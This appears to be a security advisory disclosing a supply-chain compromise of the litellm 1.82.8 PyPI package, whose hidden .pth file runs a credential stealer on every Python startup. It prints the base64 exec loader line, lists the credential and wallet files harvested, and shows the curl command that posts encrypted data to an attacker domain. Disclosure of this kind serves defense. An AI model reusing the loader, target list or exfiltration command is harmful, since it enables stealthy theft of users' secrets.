[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

3 min read Original article ↗

[LITELLM TEAM] - For updates from the team, please see: #24518

Summary

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.

This is a supply chain compromise. The malicious file is listed in the package's own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"

You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])

Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the following:

Stage 1: Information Collection

The script collects sensitive data from the host system:

  • System info: hostname, whoami, uname -a, ip addr, ip route
  • Environment variables: printenv (captures all API keys, secrets, tokens)
  • SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
  • Git credentials: ~/.gitconfig, ~/.git-credentials
  • AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
  • Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
  • GCP credentials: ~/.config/gcloud/application_default_credentials.json
  • Azure credentials: ~/.azure/
  • Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
  • Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
  • Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
  • Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
  • SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
  • CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
  • Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
  • Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

  1. Collected data is written to a temporary file
  2. A random 32-byte AES-256 session key is generated via openssl rand
  3. The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
  4. The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
  5. Both encrypted files are packed into tpcp.tar.gz
  6. The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

Key Technical Details

  • Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
  • Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
  • Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
  • RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact

Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

This affects:

  • Local development machines
  • CI/CD pipelines
  • Docker containers
  • Production servers

Affected Version

  • Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
  • Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

  1. PyPI: Yank/remove litellm 1.82.8 immediately
  2. Users: Check for litellm_init.pth in your site-packages/ directory
  3. Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
  4. BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise

Environment

  • OS: Ubuntu 24.04 (Docker container)
  • Python: 3.13
  • pip installed from PyPI
  • Discovered: 2026-03-24